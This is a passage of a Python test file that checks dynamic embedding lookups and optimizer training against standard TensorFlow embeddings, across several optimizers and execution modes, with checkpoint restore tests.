test_opt = momentum.MomentumOptimizer(1.0, momentum=0.9)
self.common_minimize_trainable(base_opt, test_opt, name="momentum")
@test_util.deprecated_graph_mode_only
def test_sgd_minimize_trainable(self):
base_opt = gradient_descent.GradientDescentOptimizer(1.0)
test_opt = gradient_descent.GradientDescentOptimizer(1.0)
self.common_minimize_trainable(base_opt, test_opt, name="sgd")
@test_util.deprecated_graph_mode_only
def test_adam_minimize_trainable(self):
base_opt = adam.AdamOptimizer(1.0)
test_opt = adam.AdamOptimizer(1.0)
self.common_minimize_trainable(base_opt, test_opt, name="adam")
@test_util.deprecated_graph_mode_only
def test_rmsprop_minimize_trainable(self):
for centered_ in [False, True]:
base_opt = rmsprop.RMSPropOptimizer(1.0, centered=centered_)
test_opt = rmsprop.RMSPropOptimizer(1.0, centered=centered_)
self.common_minimize_trainable(base_opt,
test_opt,
name="rmsprop" + str(centered_))
class CommonTrainableTestV2Base(object):
def common_minimize_trainable_v2(self, base_opt, test_opt, name):
raise NotImplementedError
def device_check(self, de):
if test_util.is_gpu_available():
self.assertTrue("GPU" in de.tables[0].resource_handle.device.upper())
@test_util.run_in_graph_and_eager_modes
def test_adadelta_v2_minimize_trainable(self):
if test_util.is_gpu_available():
self.skipTest("Skip GPU Test for no GPU kernel.")
base_opt = optimizer_v2.adadelta.Adadelta(1.0)
test_opt = optimizer_v2.adadelta.Adadelta(1.0)
self.common_minimize_trainable_v2(base_opt, test_opt, name="adadelta")
@test_util.run_in_graph_and_eager_modes
def test_adagrad_v2_minimize_trainable(self):
if test_util.is_gpu_available():
self.skipTest("Skip GPU Test for no GPU kernel.")
base_opt = optimizer_v2.adagrad.Adagrad(1.0)
test_opt = optimizer_v2.adagrad.Adagrad(1.0)
self.common_minimize_trainable_v2(base_opt, test_opt, name="adagrad")
@test_util.run_in_graph_and_eager_modes
def test_adam_v2_minimize_trainable(self):
base_opt = optimizer_v2.adam.Adam(1.0)
test_opt = optimizer_v2.adam.Adam(1.0)
self.common_minimize_trainable_v2(base_opt, test_opt, name="adam")
@test_util.run_in_graph_and_eager_modes
def test_adamax_v2_minimize_trainable(self):
if test_util.is_gpu_available():
self.skipTest("Skip GPU Test for GPU kernel has bug.")
base_opt = optimizer_v2.adamax.Adamax(1.0)
test_opt = optimizer_v2.adamax.Adamax(1.0)
self.common_minimize_trainable_v2(base_opt, test_opt, name="adamax")
@test_util.run_in_graph_and_eager_modes
def test_ftrl_v2_minimize_trainable(self):
if test_util.is_gpu_available():
self.skipTest("Skip GPU Test for no GPU kernel.")
base_opt = optimizer_v2.ftrl.Ftrl(1.0)
test_opt = optimizer_v2.ftrl.Ftrl(1.0)
self.common_minimize_trainable_v2(base_opt, test_opt, name="ftrl")
@test_util.run_in_graph_and_eager_modes
def test_sgd_v2_minimize_trainable(self):
base_opt = optimizer_v2.gradient_descent.SGD(1.0)
test_opt = optimizer_v2.gradient_descent.SGD(1.0)
self.common_minimize_trainable_v2(base_opt, test_opt, name="sgd")
@test_util.run_in_graph_and_eager_modes
def test_nadam_v2_minimize_trainable(self):
base_opt = optimizer_v2.nadam.Nadam(1.0)
test_opt = optimizer_v2.nadam.Nadam(1.0)
self.common_minimize_trainable_v2(base_opt, test_opt, name="Nadam")
@test_util.run_in_graph_and_eager_modes
def test_rmsprop_v2_minimize_trainable(self):
base_opt = optimizer_v2.rmsprop.RMSprop(1.0)
test_opt = optimizer_v2.rmsprop.RMSprop(1.0)
self.common_minimize_trainable_v2(base_opt, test_opt, name="rmsprop")
class EmbeddingLookupTrainableV1Test(test.TestCase, CommonTrainableTestV1Base):
def common_minimize_trainable(self, base_opt, test_opt, name):
de.enable_train_mode()
base_opt = de.DynamicEmbeddingOptimizer(base_opt)
test_opt = de.DynamicEmbeddingOptimizer(test_opt)
id = 0
for (
num_shards,
k_dtype,
d_dtype,
initial_mode,
dim,
run_step,
) in itertools.product(
[1, 2],
[
dtypes.int64,
],
[
dtypes.float32,
],
[
"constant",
],
[1, 10],
[10],
):
id += 1
with self.session(use_gpu=test_util.is_gpu_available(),
config=default_config) as sess:
# common define
raw_init_ids = [0, 1]
raw_init_vals = np.random.rand(2, dim)
raw_ids = [
0,
]
x = constant_op.constant(np.random.rand(dim, len(raw_ids)),
dtype=d_dtype)
# base graph
base_var = resource_variable_ops.ResourceVariable(raw_init_vals,
dtype=d_dtype)
ids = constant_op.constant(raw_ids, dtype=k_dtype)
pred0 = math_ops.matmul(embedding_ops.embedding_lookup([base_var], ids),
x)
loss0 = pred0 * pred0
base_opt_op = base_opt.minimize(loss0)
# test graph
embeddings = de.get_variable(
"t2020-" + name + str(id),
key_dtype=k_dtype,
value_dtype=d_dtype,
devices=_get_devices() * num_shards,
initializer=1.0,
dim=dim,
)
self.device_check(embeddings)
init_ids = constant_op.constant(raw_init_ids, dtype=k_dtype)
init_vals = constant_op.constant(raw_init_vals, dtype=d_dtype)
init_op = embeddings.upsert(init_ids, init_vals)
self.evaluate(init_op)
test_var, trainable = de.embedding_lookup([embeddings],
ids,
return_trainable=True)
pred1 = math_ops.matmul(test_var, x)
loss1 = pred1 * pred1
test_opt_op = test_opt.minimize(loss1, var_list=[trainable])
self.evaluate(variables.global_variables_initializer())
for _ in range(run_step):
sess.run(base_opt_op)
# Fetch params to validate initial values
self.assertAllCloseAccordingToType(raw_init_vals[raw_ids],
self.evaluate(test_var))
# Run `run_step` step of sgd
for _ in range(run_step):
sess.run(test_opt_op)
table_var = embeddings.lookup(ids)
# Validate updated params
self.assertAllCloseAccordingToType(
self.evaluate(base_var)[raw_ids],
self.evaluate(table_var),
msg="Cond:{},{},{},{},{},{}".format(num_shards, k_dtype, d_dtype,
initial_mode, dim, run_step),
)
class EmbeddingLookupTrainableV2Test(test.TestCase, CommonTrainableTestV2Base):
def common_minimize_trainable_v2(self, base_opt, test_opt, name):
de.enable_train_mode()
tf.config.set_soft_device_placement(True)
base_opt = de.DynamicEmbeddingOptimizer(base_opt)
test_opt = de.DynamicEmbeddingOptimizer(test_opt)
id = 0
for (
num_shards,
k_dtype,
d_dtype,
initial_mode,
dim,
run_step,
) in itertools.product(
[1, 2],
[
dtypes.int64,
],
[
dtypes.float32,
],
[
"constant",
],
[1, 10],
[10],
):
id += 1
# common define
raw_init_ids = [0, 1]
raw_init_vals = np.random.rand(2, dim)
raw_ids = [
0,
]
# base graph
def base_fn():
embeddings = resource_variable_ops.ResourceVariable(raw_init_vals,
dtype=d_dtype)
def loss_fn(emb):
ids = constant_op.constant(raw_ids, dtype=k_dtype)
pred = embedding_ops.embedding_lookup([emb], ids)
return pred * pred
base_opt_op = base_opt.minimize(lambda: loss_fn(embeddings),
[embeddings])
self.evaluate(variables.global_variables_initializer())
for _ in range(run_step):
self.evaluate(base_opt_op)
return embeddings
base_opt_val = self.evaluate(base_fn())
def test_fn():
embeddings = de.get_variable(
"t2020-v2-" + name + str(id),
key_dtype=k_dtype,
value_dtype=d_dtype,
devices=_get_devices() * num_shards,
initializer=1.0,
dim=dim,
)
self.device_check(embeddings)
trainables = []
init_ids = constant_op.constant(raw_init_ids, dtype=k_dtype)
init_vals = constant_op.constant(raw_init_vals, dtype=d_dtype)
self.evaluate(embeddings.upsert(init_ids, init_vals))
def var_fn():
return trainables
def loss_fn(x, trainables):
ids = constant_op.constant(raw_ids, dtype=k_dtype)
pred, trainable = de.embedding_lookup([x], ids, return_trainable=True)
trainables.clear()
trainables.append(trainable)
return pred * pred
test_opt_op = test_opt.minimize(lambda: loss_fn(embeddings, trainables),
var_fn)
self.evaluate(variables.global_variables_initializer())
for _ in range(run_step):
self.evaluate(test_opt_op)
return embeddings.lookup(init_ids)
with ops.device(_get_devices()[0]):
test_opt_val = self.evaluate(test_fn())
self.assertAllCloseAccordingToType(
base_opt_val,
test_opt_val,
msg="Cond:{},{},{},{},{},{}".format(num_shards, k_dtype, d_dtype,
initial_mode, dim, run_step),
)
class EmbeddingLookupUniqueTrainableV1Test(test.TestCase,
CommonTrainableTestV1Base):
def common_minimize_trainable(self, base_opt, test_opt, name):
de.enable_train_mode()
base_opt = de.DynamicEmbeddingOptimizer(base_opt)
test_opt = de.DynamicEmbeddingOptimizer(test_opt)
id = 0
for (
num_shards,
k_dtype,
d_dtype,
initial_mode,
dim,
run_step,
) in itertools.product(
[1, 2],
[
dtypes.int64,
],
[
dtypes.float32,
],
[
"constant",
],
[1, 10],
[10],
):
id += 1
with self.session(use_gpu=test_util.is_gpu_available(),
config=default_config) as sess:
# common define
raw_init_ids = [0, 1, 2, 3, 4]
raw_init_vals = np.random.rand(5, dim)
raw_ids = [0, 1, 1, 2, 3, 4, 4]
x = constant_op.constant(np.random.rand(dim, len(raw_ids)),
dtype=d_dtype)
# base graph
ids = constant_op.constant(raw_ids, dtype=k_dtype)
base_var = resource_variable_ops.ResourceVariable(raw_init_vals,
dtype=d_dtype)
unique_ids, idx = array_ops.unique(ids)
unique_embeddings = embedding_ops.embedding_lookup([base_var],
unique_ids)
embeddings = array_ops.gather(unique_embeddings, idx)
pred0 = math_ops.matmul(embeddings, x)
loss0 = pred0 * pred0
base_opt_op = base_opt.minimize(loss0)
# test graph
embeddings = de.get_variable(
"t-embedding_lookup_unique-v1-" + name + str(id),
key_dtype=k_dtype,
value_dtype=d_dtype,
devices=_get_devices() * num_shards,
initializer=1.0,
dim=dim,
)
self.device_check(embeddings)
init_ids = constant_op.constant(raw_init_ids, dtype=k_dtype)
init_vals = constant_op.constant(raw_init_vals, dtype=d_dtype)
init_op = embeddings.upsert(init_ids, init_vals)
self.evaluate(init_op)
test_var, trainable = de.embedding_lookup_unique([embeddings],
ids,
return_trainable=True)
pred1 = math_ops.matmul(test_var, x)
loss1 = pred1 * pred1
test_opt_op = test_opt.minimize(loss1, var_list=[trainable])
self.evaluate(variables.global_variables_initializer())
for _ in range(run_step):
sess.run(base_opt_op)
# Fetch params to validate initial values
self.assertAllCloseAccordingToType(raw_init_vals[raw_ids],
self.evaluate(test_var))
# Run `run_step` step of sgd
for _ in range(run_step):
sess.run(test_opt_op)
table_var = embeddings.lookup(ids)
# Validate updated params
self.assertAllCloseAccordingToType(
self.evaluate(base_var)[raw_ids],
self.evaluate(table_var),
msg="Cond:{},{},{},{},{},{}".format(num_shards, k_dtype, d_dtype,
initial_mode, dim, run_step),
)
class EmbeddingLookupUniqueTrainableV2Test(test.TestCase,
CommonTrainableTestV2Base):
def common_minimize_trainable_v2(self, base_opt, test_opt, name):
de.enable_train_mode()
base_opt = de.DynamicEmbeddingOptimizer(base_opt)
test_opt = de.DynamicEmbeddingOptimizer(test_opt)
id = 0
for (
num_shards,
k_dtype,
d_dtype,
initial_mode,
dim,
run_step,
) in itertools.product(
[1, 2],
[
dtypes.int64,
],
[
dtypes.float32,
],
[
"constant",
],
[1, 10],
[10],
):
id += 1
# common define
raw_init_ids = [0, 1, 2, 3, 4]
raw_init_vals = np.random.rand(5, dim)
raw_ids = [0, 1, 1, 2, 3, 4, 4]
# base graph
def base_fn():
embeddings = resource_variable_ops.ResourceVariable(raw_init_vals,
dtype=d_dtype)
def loss_fn(emb):
ids = constant_op.constant(raw_ids, dtype=k_dtype)
unique_ids, idx = array_ops.unique(ids)
unique_embeddings = embedding_ops.embedding_lookup([emb], unique_ids)
pred = array_ops.gather(unique_embeddings, idx)
return pred * pred
base_opt_op = base_opt.minimize(lambda: loss_fn(embeddings),
[embeddings])
self.evaluate(variables.global_variables_initializer())
for _ in range(run_step):
self.evaluate(base_opt_op)
return embeddings
base_opt_val = self.evaluate(base_fn())
def test_fn():
embeddings = de.get_variable(
"t2020-v2-" + name + str(id),
key_dtype=k_dtype,
value_dtype=d_dtype,
devices=_get_devices() * num_shards,
initializer=1.0,
dim=dim,
)
self.device_check(embeddings)
trainables = []
init_ids = constant_op.constant(raw_init_ids, dtype=k_dtype)
init_vals = constant_op.constant(raw_init_vals, dtype=d_dtype)
self.evaluate(embeddings.upsert(init_ids, init_vals))
def var_fn():
return trainables
def loss_fn(x, trainables):
ids = constant_op.constant(raw_ids, dtype=k_dtype)
pred, trainable = de.embedding_lookup_unique([x],
ids,
return_trainable=True)
trainables.clear()
trainables.append(trainable)
return pred * pred
test_opt_op = test_opt.minimize(lambda: loss_fn(embeddings, trainables),
var_fn)
self.evaluate(variables.global_variables_initializer())
for _ in range(run_step):
self.evaluate(test_opt_op)
return embeddings.lookup(init_ids)
with ops.device(_get_devices()[0]):
test_opt_val = self.evaluate(test_fn())
self.assertAllCloseAccordingToType(
base_opt_val,
test_opt_val,
msg="Cond:{},{},{},{},{},{}".format(num_shards, k_dtype, d_dtype,
initial_mode, dim, run_step),
)
class EmbeddingLookupSparseTrainableV1Test(test.TestCase,
CommonTrainableTestV1Base):
def common_minimize_trainable(self, base_opt, test_opt, name):
de.enable_train_mode()
base_opt = de.DynamicEmbeddingOptimizer(base_opt)
test_opt = de.DynamicEmbeddingOptimizer(test_opt)
id = 0
config = config_pb2.ConfigProto()
config.allow_soft_placement = False
for (
num_shards,
k_dtype,
d_dtype,
initial_mode,
dim,
run_step,
) in itertools.product(
[1, 2],
[dtypes.int64],
[
dtypes.float32,
],
[
"constant",
],
[1, 10],
[10],
):
id += 1
raw_init_ids = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
raw_init_vals = [[
x,
] * dim for x in [0.0, 0.1, 0.3, 0.8, 0.16, 0.25, 0.36, 0.49, 0.64, 0.81]]
raw_ids = constant_op.constant([1, 3, 3, 9], dtype=k_dtype)
sp_ids = sparse_tensor.SparseTensor(
indices=[
[0, 0],
[0, 1],
[1, 0],
[2, 1],
],
values=raw_ids,
dense_shape=[3, 2],
)
x = constant_op.constant([[_x * dim] for _x in [[0.4], [0.5], [0.6]]],
dtype=d_dtype)
x = array_ops.reshape(x, shape=(3 * dim, 1))
# base branch
with self.session(use_gpu=test_util.is_gpu_available(),
config=default_config) as sess:
base_var = variables.Variable(
np.array(raw_init_vals).reshape([len(raw_init_ids), dim]),
dtype=d_dtype,
shape=[len(raw_init_ids), dim],
)
base_embedding = embedding_ops.embedding_lookup_sparse(base_var,
sp_ids,
None,
combiner="sum")
base_embedding = array_ops.reshape(base_embedding, shape=[1, 3 * dim])
pred0 = math_ops.matmul(base_embedding, x)
loss0 = pred0 * pred0
base_opt_op = base_opt.minimize(loss0, var_list=[base_var])
# run base
self.evaluate(variables.global_variables_initializer())
for _ in range(run_step):
sess.run(base_opt_op)
base_var_val = self.evaluate(base_var)
# test branch
with self.session(config=default_config,
use_gpu=test_util.is_gpu_available()) as sess:
# test var prepare
embeddings = de.get_variable(
"t1030-" + name + str(id),
key_dtype=k_dtype,
value_dtype=d_dtype,
devices=_get_devices() * num_shards,
initializer=1.0,
dim=dim,
)
self.device_check(embeddings)
init_ids = constant_op.constant(raw_init_ids, dtype=k_dtype)
init_vals = constant_op.constant(raw_init_vals, dtype=d_dtype)
init_op = embeddings.upsert(init_ids, init_vals)
self.evaluate(init_op)
test_var, trainable = de.embedding_lookup_sparse(
embeddings,
sp_ids,
sp_weights=None,
combiner="sum",
return_trainable=True,
)
pred1 = math_ops.matmul(array_ops.reshape(test_var, shape=[1, 3 * dim]),
x)
loss1 = pred1 * pred1
test_opt_op = test_opt.minimize(loss1, var_list=[trainable])
self.evaluate(variables.global_variables_initializer())
self.assertAllCloseAccordingToType(
np.array(raw_init_vals).reshape([len(raw_init_ids), dim]),
self.evaluate(base_var),
)
# Run `run_step` step of sgd
for _ in range(run_step):
sess.run(test_opt_op)
if test_util.is_gpu_available():
self.assertTrue(
_check_device(embeddings.tables[0].resource_handle, "GPU"))
table_var_val = self.evaluate(
array_ops.reshape(embeddings.lookup(init_ids), shape=[10, dim]))
# Validate updated params
self.assertAllCloseAccordingToType(
base_var_val,
table_var_val,
msg="Cond:{},{},{},{},{}".format(num_shards, k_dtype, d_dtype, dim,
run_step),
)
class EmbeddingLookupSparseTrainableV2Test(test.TestCase,
CommonTrainableTestV2Base):
def common_minimize_trainable_v2(self, base_opt, test_opt, name):
de.enable_train_mode()
tf.config.set_soft_device_placement(True)
base_opt = de.DynamicEmbeddingOptimizer(base_opt)
test_opt = de.DynamicEmbeddingOptimizer(test_opt)
id = 0
for (
num_shards,
k_dtype,
d_dtype,
initial_mode,
dim,
run_step,
) in itertools.product(
[1, 2],
[
dtypes.int64,
],
[
dtypes.float32,
],
[
"constant",
],
[1, 10],
[10],
):
id += 1
raw_init_ids = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
raw_init_vals = [[
x,
] * dim for x in [0.0, 0.1, 0.3, 0.8, 0.16, 0.25, 0.36, 0.49, 0.64, 0.81]]
with ops.device(_get_devices()[0]):
raw_ids = constant_op.constant([1, 3, 3, 9], dtype=k_dtype)
sp_ids = sparse_tensor.SparseTensor(
indices=[
[0, 0],
[0, 1],
[1, 0],
[2, 1],
],
values=raw_ids,
dense_shape=[3, 2],
)
x = constant_op.constant([[_x * dim] for _x in [[0.4], [0.5], [0.6]]],
dtype=d_dtype)
x = array_ops.reshape(x, shape=(dim, -1))
# # base graph
def base_fn():
embeddings = variables.Variable(
np.array(raw_init_vals).reshape([len(raw_init_ids), dim]),
dtype=d_dtype,
shape=[len(raw_init_ids), dim],
)
def loss_fn(emb):
embedding = embedding_ops.embedding_lookup_sparse(emb,
sp_ids,
None,
combiner="sum")
pred = math_ops.matmul(embedding, x)
return pred * pred
base_opt_op = base_opt.minimize(lambda: loss_fn(embeddings),
[embeddings])
self.evaluate(variables.global_variables_initializer())
for _ in range(run_step):
self.evaluate(base_opt_op)
return embeddings
base_opt_val = self.evaluate(base_fn())
def test_fn():
embeddings = de.get_variable(
"t1030-v2-" + name + str(id),
key_dtype=k_dtype,
value_dtype=d_dtype,
devices=_get_devices() * num_shards,
initializer=1.0,
dim=dim,
)
self.device_check(embeddings)
init_ids = constant_op.constant(raw_init_ids, dtype=k_dtype)
init_vals = constant_op.constant(raw_init_vals, dtype=d_dtype)
self.evaluate(embeddings.upsert(init_ids, init_vals))
trainables = []
def var_fn():
return trainables
def loss_fn(emb, trainables):
test_var, trainable = de.embedding_lookup_sparse(
emb,
sp_ids,
sp_weights=None,
combiner="sum",
return_trainable=True,
)
pred = math_ops.matmul(test_var, x)
trainables.clear()
trainables.append(trainable)
return pred * pred
test_opt_op = test_opt.minimize(lambda: loss_fn(embeddings, trainables),
var_fn)
self.evaluate(variables.global_variables_initializer())
for _ in range(run_step):
self.evaluate(test_opt_op)
return embeddings.lookup(init_ids)
test_opt_val = self.evaluate(test_fn())
self.assertAllCloseAccordingToType(
base_opt_val,
test_opt_val,
msg="Cond:{},{},{},{},{},{}".format(num_shards, k_dtype, d_dtype,
initial_mode, dim, run_step),
)
class SafeEmbeddingLookupSparseTrainableV1Test(test.TestCase,
CommonTrainableTestV1Base):
@test_util.deprecated_graph_mode_only
def common_minimize_trainable(self, base_opt, test_opt, name):
de.enable_train_mode()
base_opt = de.DynamicEmbeddingOptimizer(base_opt)
test_opt = de.DynamicEmbeddingOptimizer(test_opt)
id = 0
config = config_pb2.ConfigProto(
allow_soft_placement=True,
gpu_options=config_pb2.GPUOptions(allow_growth=True),
)
for (
num_shards,
k_dtype,
d_dtype,
initial_mode,
dim,
run_step,
) in itertools.product(
[1, 2],
[dtypes.int64],
[
dtypes.float32,
],
[
"constant",
],
[1, 10],
[10],
):
with self.session(config=config, use_gpu=test_util.is_gpu_available()):
id += 1
raw_init_ids = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
raw_init_vals = [
[
x,
] * dim
for x in [0.0, 0.1, 0.3, 0.8, 0.16, 0.25, 0.36, 0.49, 0.64, 0.81]
]
raw_ids = constant_op.constant([1, 3, 3, 9], dtype=k_dtype)
sp_ids = sparse_tensor.SparseTensor(
indices=[
[0, 0],
[0, 1],
[1, 0],
[2, 1],
],
values=raw_ids,
dense_shape=[3, 2],
)
x = constant_op.constant([[_x * dim] for _x in [[0.4], [0.5], [0.6]]],
dtype=d_dtype)
x = array_ops.reshape(x, shape=(3 * dim, 1))
# base var prepare
base_var = variables.Variable(
np.array(raw_init_vals).reshape([len(raw_init_ids), dim]),
dtype=d_dtype,
shape=[len(raw_init_ids), dim],
)
base_embedding = embedding_ops.safe_embedding_lookup_sparse(
base_var, sp_ids, None, combiner="sum")
base_embedding = array_ops.reshape(base_embedding, shape=[1, 3 * dim])
pred0 = math_ops.matmul(base_embedding, x)
loss0 = pred0 * pred0
base_opt_op = base_opt.minimize(loss0, var_list=[base_var])
# test var prepare
embeddings = de.get_variable(
"s6030-" + name + str(id),
key_dtype=k_dtype,
value_dtype=d_dtype,
devices=_get_devices() * num_shards,
initializer=1.0,
dim=dim,
)
self.device_check(embeddings)
init_ids = constant_op.constant(raw_init_ids, dtype=k_dtype)
init_vals = constant_op.constant(raw_init_vals, dtype=d_dtype)
init_op = embeddings.upsert(init_ids, init_vals)
self.evaluate(init_op)
# test branch
test_var, trainable = de.safe_embedding_lookup_sparse(
embeddings,
sp_ids,
sparse_weights=None,
combiner="sum",
return_trainable=True,
)
pred1 = math_ops.matmul(array_ops.reshape(test_var, shape=[1, 3 * dim]),
x)
loss1 = pred1 * pred1
test_opt_op = test_opt.minimize(loss1, var_list=[trainable])
self.evaluate(variables.global_variables_initializer())
self.assertAllCloseAccordingToType(
np.array(raw_init_vals).reshape([len(raw_init_ids), dim]),
self.evaluate(base_var),
)
# run base
for _ in range(run_step):
self.evaluate(base_opt_op)
# Run `run_step` step of sgd
for _ in range(run_step):
self.evaluate(test_opt_op)
table_var = array_ops.reshape(embeddings.lookup(init_ids),
shape=[10, dim])
# Validate updated params
self.assertAllCloseAccordingToType(
self.evaluate(base_var),
self.evaluate(table_var),
msg="Cond:{},{},{},{},{}".format(num_shards, k_dtype, d_dtype, dim,
run_step),
)
class SafeEmbeddingLookupSparseTrainableV2Test(test.TestCase,
CommonTrainableTestV2Base):
def common_minimize_trainable_v2(self, base_opt, test_opt, name):
de.enable_train_mode()
tf.config.set_soft_device_placement(True)
base_opt = de.DynamicEmbeddingOptimizer(base_opt)
test_opt = de.DynamicEmbeddingOptimizer(test_opt)
id = 0
for (
num_shards,
k_dtype,
d_dtype,
initial_mode,
dim,
run_step,
) in itertools.product(
[1, 2],
[
dtypes.int64,
],
[
dtypes.float32,
],
[
"constant",
],
[1, 10],
[10],
):
id += 1
raw_init_ids = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
raw_init_vals = [[
x,
] * dim for x in [0.0, 0.1, 0.3, 0.8, 0.16, 0.25, 0.36, 0.49, 0.64, 0.81]]
raw_ids = constant_op.constant([1, 3, 3, 9], dtype=k_dtype)
sp_ids = sparse_tensor.SparseTensor(
indices=[
[0, 0],
[0, 1],
[1, 0],
[2, 1],
],
values=raw_ids,
dense_shape=[3, 2],
)
x = constant_op.constant([[_x * dim] for _x in [[0.4], [0.5], [0.6]]],
dtype=d_dtype)
x = array_ops.reshape(x, shape=(dim, -1))
# # base graph
def base_fn():
embeddings = variables.Variable(
np.array(raw_init_vals).reshape([len(raw_init_ids), dim]),
dtype=d_dtype,
shape=[len(raw_init_ids), dim],
)
def loss_fn(emb):
embedding = embedding_ops.safe_embedding_lookup_sparse(emb,
sp_ids,
None,
combiner="sum")
pred0 = math_ops.matmul(embedding, x)
return pred0 * pred0
base_opt_op = base_opt.minimize(lambda: loss_fn(embeddings),
[embeddings])
self.evaluate(variables.global_variables_initializer())
for _ in range(run_step):
self.evaluate(base_opt_op)
return embeddings
base_opt_val = self.evaluate(base_fn())
def test_fn():
embeddings = de.get_variable(
"s6030-v2-" + name + str(id),
key_dtype=k_dtype,
value_dtype=d_dtype,
devices=_get_devices() * num_shards,
initializer=1.0,
dim=dim,
)
self.device_check(embeddings)
init_ids = constant_op.constant(raw_init_ids, dtype=k_dtype)
init_vals = constant_op.constant(raw_init_vals, dtype=d_dtype)
self.evaluate(embeddings.upsert(init_ids, init_vals))
trainables = []
def var_fn():
return trainables
def loss_fn(emb, trainables):
test_var, trainable = de.safe_embedding_lookup_sparse(
emb,
sp_ids,
sparse_weights=None,
combiner="sum",
return_trainable=True,
)
pred = math_ops.matmul(test_var, x)
trainables.clear()
trainables.append(trainable)
return pred * pred
test_opt_op = test_opt.minimize(lambda: loss_fn(embeddings, trainables),
var_fn)
self.evaluate(variables.global_variables_initializer())
for _ in range(run_step):
self.evaluate(test_opt_op)
return embeddings.lookup(init_ids)
test_opt_val = test_fn()
self.assertAllCloseAccordingToType(
base_opt_val,
test_opt_val,
msg="Cond:{},{},{},{},{},{}".format(num_shards, k_dtype, d_dtype,
initial_mode, dim, run_step),
)
@test_util.deprecated_graph_mode_only
class TrainDynamicEmbeddingInMonitoredTrainingSessionTest(test.TestCase):
"""Tests Training in MonitoredTrainingSession."""
def device_check(self, de):
if test_util.is_gpu_available():
self.assertTrue("GPU" in de.tables[0].resource_handle.device.upper())
def test_saving_restoring_checkpoint(self):
logdir = _test_dir(self.get_temp_dir(), "test_saving_restoring_checkpoint")
with ops.Graph().as_default():
gstep = training_util.create_global_step()
do_step = state_ops.assign_add(gstep, 1)
v0 = variables.Variable(10.0, name="v0")
v1 = variables.Variable(20.0, name="v1")
target_values = [[0.0], [1.0], [2.0]]
keys = array_ops.placeholder(dtypes.int64)
values = constant_op.constant(target_values, dtypes.float32)
table = de.Variable(
key_dtype=dtypes.int64,
value_dtype=dtypes.float32,
initializer=-1.0,
name="m100",
dim=1,
)
upsert_op = table.upsert(keys, values)
lookup_op = table.lookup(keys)
size_op = table.size()
with monitored_session.MonitoredTrainingSession(
config=default_config, is_chief=True, checkpoint_dir=logdir) as sess:
self.assertEqual(0, sess.run(gstep))
self.assertEqual(1, sess.run(do_step))
self.assertEqual(2, sess.run(do_step))
# Check that the parameter nodes have been initialized.
self.assertEqual(10.0, sess.run(v0))
self.assertEqual(20.0, sess.run(v1))
self.assertAllEqual(0, sess.run(size_op))
sess.run(upsert_op, feed_dict={keys: [0, 1, 2]})
self.assertAllEqual(3, sess.run(size_op))
self.device_check(table)
# A restart will find the checkpoint and recover automatically.
with monitored_session.MonitoredTrainingSession(
config=default_config, is_chief=True, checkpoint_dir=logdir) as sess:
self.assertEqual(2, sess.run(gstep))
self.assertAllEqual(3, sess.run(table.size()))
self.assertAllEqual(target_values,
sess.run(lookup_op, feed_dict={keys: [0, 1, 2]}))
self.device_check(table)
def common_minimize_trainable(self, base_opt, test_opt, name):
de.enable_train_mode()
base_opt = de.DynamicEmbeddingOptimizer(base_opt)
test_opt = de.DynamicEmbeddingOptimizer(test_opt)
id = 0
for (
num_shards,
k_dtype,
d_dtype,
initial_mode,
dim,
run_step,
) in itertools.product(
[3],
[dtypes.int64],
[
dtypes.float32,
],
[
"constant",
],
[1, 10],
[10],
):
with ops.Graph().as_default():
id += 1
raw_init_ids = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
raw_init_vals = [
[
x,
] * dim
for x in [0.0, 0.1, 0.3, 0.8, 0.16, 0.25, 0.36, 0.49, 0.64, 0.81]
]
raw_ids = constant_op.constant([1, 3, 3, 9], dtype=k_dtype)
sp_ids = sparse_tensor.SparseTensor(
indices=[
[0, 0],
[0, 1],
[1, 0],
[2, 1],
],
values=raw_ids,
dense_shape=[3, 2],
)
x = constant_op.constant([[_x * dim] for _x in [[0.4], [0.5], [0.6]]],
dtype=d_dtype)
x = array_ops.reshape(x, shape=(3 * dim, 1))
# base var prepare
base_var = variables.Variable(
np.array(raw_init_vals).reshape([len(raw_init_ids), dim]),
dtype=d_dtype,
shape=[len(raw_init_ids), dim],
)
# test var prepare
embeddings = de.get_variable(
"t1030-" + name + str(id),
key_dtype=k_dtype,
value_dtype=d_dtype,
devices=_get_devices() * num_shards,
initializer=1.0,
dim=dim,
)
init_ids = constant_op.constant(raw_init_ids, dtype=k_dtype)
init_vals = constant_op.constant(raw_init_vals, dtype=d_dtype)
init_op = embeddings.upsert(init_ids, init_vals)
# base branch
base_embedding = embedding_ops.embedding_lookup_sparse(base_var,
sp_ids,
None,
combiner="sum")
base_embedding = array_ops.reshape(base_embedding, shape=[1, 3 * dim])
pred0 = math_ops.matmul(base_embedding, x)
loss0 = pred0 * pred0
base_opt_op = base_opt.minimize(loss0, var_list=[base_var])
# test branch
test_var, trainable = de.embedding_lookup_sparse(
embeddings,
sp_ids,
sp_weights=None,
combiner="sum",
return_trainable=True,
)
pred1 = math_ops.matmul(array_ops.reshape(test_var, shape=[1, 3 * dim]),
x)
loss1 = pred1 * pred1
gstep = training_util.create_global_step()
test_opt_op = test_opt.minimize(loss1,
var_list=[trainable],
global_step=gstep)
table_var = array_ops.reshape(embeddings.lookup(init_ids),
shape=[10, dim])
with monitored_session.MonitoredTrainingSession(
is_chief=True, config=default_config) as sess:
sess.run(init_op)
self.assertAllCloseAccordingToType(
np.array(raw_init_vals).reshape([len(raw_init_ids), dim]),
sess.run(base_var),
)
# run base
for _ in range(run_step):
sess.run(base_opt_op)
sess.run(test_opt_op)
# Validate global_step
self.assertEqual(run_step, sess.run(gstep))
# Validate updated params
self.assertAllCloseAccordingToType(
sess.run(base_var),
sess.run(table_var),
msg="Cond:{},{},{},{},{}".format(num_shards, k_dtype, d_dtype,
dim, run_step),
)
self.device_check(embeddings)
def test_adam_minimize_trainable(self):
base_opt = adam.AdamOptimizer(0.1)
test_opt = adam.AdamOptimizer(0.1)
self.common_minimize_trainable(base_opt, test_opt, name="adam")
def test_adagrad_minimize_trainable(self):
base_opt = adagrad.AdagradOptimizer(0.1)
test_opt = adagrad.AdagradOptimizer(0.1)
self.common_minimize_trainable(base_opt, test_opt, name="adagrad")
@test_util.deprecated_graph_mode_only
class ModelModeTest(test.TestCase):
"""Tests ModelMode."""
def test_check_ops_number(self):
self.assertTrue(de.get_model_mode() == "train")
de.enable_inference_mode()
